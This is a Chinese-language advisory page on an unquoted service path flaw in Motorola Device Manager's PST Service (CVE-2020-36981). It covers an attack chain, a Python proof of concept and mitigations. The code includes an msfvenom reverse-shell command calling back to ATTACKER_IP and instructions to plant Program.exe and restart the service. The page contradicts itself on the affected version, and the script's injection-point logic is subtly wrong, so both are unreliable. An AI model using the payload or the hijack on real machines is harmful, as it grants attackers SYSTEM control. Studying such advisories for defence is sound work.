CVE-2020-36981 | Motorola Device Manager 未引号服务路径提权漏洞

漏洞信息

漏洞编号

CVE-2020-36981

漏洞类型

未引号服务路径

CVSS评分

7.8 高危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Motorola Device Manager

漏洞概述

CVE-2020-36981是Motorola Device Manager 2.4.5版本中发现的一个高危本地权限提升漏洞。该漏洞存在于PST Service服务组件中，由于服务可执行文件路径未使用引号包裹，攻击者可以利用Windows服务路径解析特性，在服务启动时以提升的SYSTEM权限执行任意恶意代码。攻击者只需具备本地低权限用户身份，即可通过在服务路径中的中间目录植入恶意可执行文件，实现从普通用户到系统最高权限的提权。此类漏洞虽然需要本地访问，但由于其能够获取系统完全控制权，CVSS评分达到7.8分，属于高危级别。对于企业内网环境，如果终端安全配置不当，攻击者可利用此漏洞突破系统防护，窃取敏感数据或部署进一步攻击。

技术细节

该漏洞的根本原因在于Windows服务配置中可执行文件路径未使用双引号包裹。当系统启动服务时，Windows会按照路径空格分隔符逐级查找可执行文件。以本漏洞为例，假设服务配置的路径为C:\Program Files\Motorola Device Manager\ForwardDaemon.exe，Windows会首先尝试在C:\Program.exe，如果不存在则继续查找C:\Program Files\ForwardDaemon.exe。攻击者可以将恶意可执行文件命名为Program.exe并放置在C:\根目录，或命名为ForwardDaemon.exe放置在C:\Program Files\目录中。由于服务以SYSTEM权限运行，恶意代码也将以SYSTEM权限执行，从而实现权限提升。攻击者利用vulncheck.com披露的PST Service中的ForwardDaemon.exe服务路径即可实施攻击，Metasploit框架和Exploit-DB也提供了相关利用模块。

攻击链分析

STEP 1

信息收集

攻击者获取目标系统的本地低权限访问权限，使用wmic或sc命令查询PST Service服务配置，发现ForwardDaemon.exe的可执行文件路径未使用引号包裹

STEP 2

路径分析

分析未引号路径C:\Program Files\Motorola Device Manager\ForwardDaemon.exe，识别可注入恶意代码的中间目录位置（C:\Program.exe或C:\Program Files\ForwardDaemon.exe）

STEP 3

恶意程序制作

使用Metasploit的msfvenom工具生成反向Shell payload，命名为Program.exe或ForwardDaemon.exe，准备植入到服务路径的中间目录

STEP 4

恶意程序植入

将恶意可执行文件复制到识别的注入点（如C:\Program.exe），确保该文件会在服务启动时被Windows服务控制管理器执行

STEP 5

触发服务重启

等待系统更新、服务重启或系统重启，或使用sc命令手动重启PST Service服务（需要管理员权限或特定条件）

STEP 6

权限提升

Windows在查找ForwardDaemon.exe时首先执行攻击者植入的恶意程序，由于服务以SYSTEM账户运行，恶意代码获得系统最高权限

STEP 7

持久化控制

攻击者获得SYSTEM权限后，可进一步部署后门、窃取凭据、横向移动或完全控制受害系统

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2020-36981 - Motorola Device Manager Unquoted Service Path
# This PoC demonstrates the unquoted service path vulnerability in ForwardDaemon.exe
# Attack prerequisite: Local user access with low privileges

import os
import subprocess
import ctypes

def check_vulnerability():
    """Check if the target service is vulnerable to unquoted path"""
    service_name = "PST Service"
    try:
        # Query service configuration using sc command
        result = subprocess.run(
            ["sc", "qc", service_name],
            capture_output=True,
            text=True
        )
        
        if "BINARY_PATH_NAME" in result.stdout:
            print("[*] Service found, checking binary path...")
            for line in result.stdout.split('\n'):
                if "BINARY_PATH_NAME" in line:
                    path = line.split(":", 1)[1].strip()
                    print(f"[*] Current path: {path}")
                    
                    # Check if path is unquoted
                    if '"' not in path:
                        print("[!] VULNERABLE: Path is not quoted!")
                        return True
                    else:
                        print("[-] SAFE: Path is properly quoted")
                        return False
    except Exception as e:
        print(f"[-] Error: {e}")
        return False

def exploit_unquoted_path():
    """
    Exploitation steps:
    1. Identify the unquoted path: C:\Program Files\Motorola Device Manager\ForwardDaemon.exe
    2. Create malicious executable named 'Program.exe' in C:\
    3. Wait for service restart or reboot
    4. Malicious code executes with SYSTEM privileges
    """
    
    vulnerable_path = "C:\\Program Files\\Motorola Device Manager\\ForwardDaemon.exe"
    
    # Extract potential injection points
    parts = vulnerable_path.split('\\')
    print("[*] Potential injection points:")
    
    current_path = ""
    for i, part in enumerate(parts[:-1]):
        current_path += part + "\\"
        if ' ' in part and '"' not in vulnerable_path:
            print(f"[+] {current_path}{part}.exe")
    
    # Generate reverse shell payload
    # msfvenom -p windows/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=4444 -f exe > Program.exe
    
    print("\n[!] Exploitation requires:")
    print("1. Create malicious executable at injection point")
    print("2. Wait for service restart or trigger manually: sc stop 'PST Service' && sc start 'PST Service'")
    print("3. Receive SYSTEM shell on attacker machine")

if __name__ == "__main__":
    print("=== CVE-2020-36981 PoC ===")
    check_vulnerability()
    exploit_unquoted_path()

影响范围

Motorola Device Manager < 2.4.5

防御指南

临时缓解措施

立即检查是否存在PST Service服务及其配置路径，如发现未引号路径，临时措施包括：1）使用icacls命令限制目录权限，阻止非管理员用户写入；2）在服务路径中间目录创建同名空文件或目录防止注入；3）如果业务允许，临时停止该服务；4）联系IT部门安排紧急补丁更新。建议优先部署厂商发布的安全更新修复此漏洞。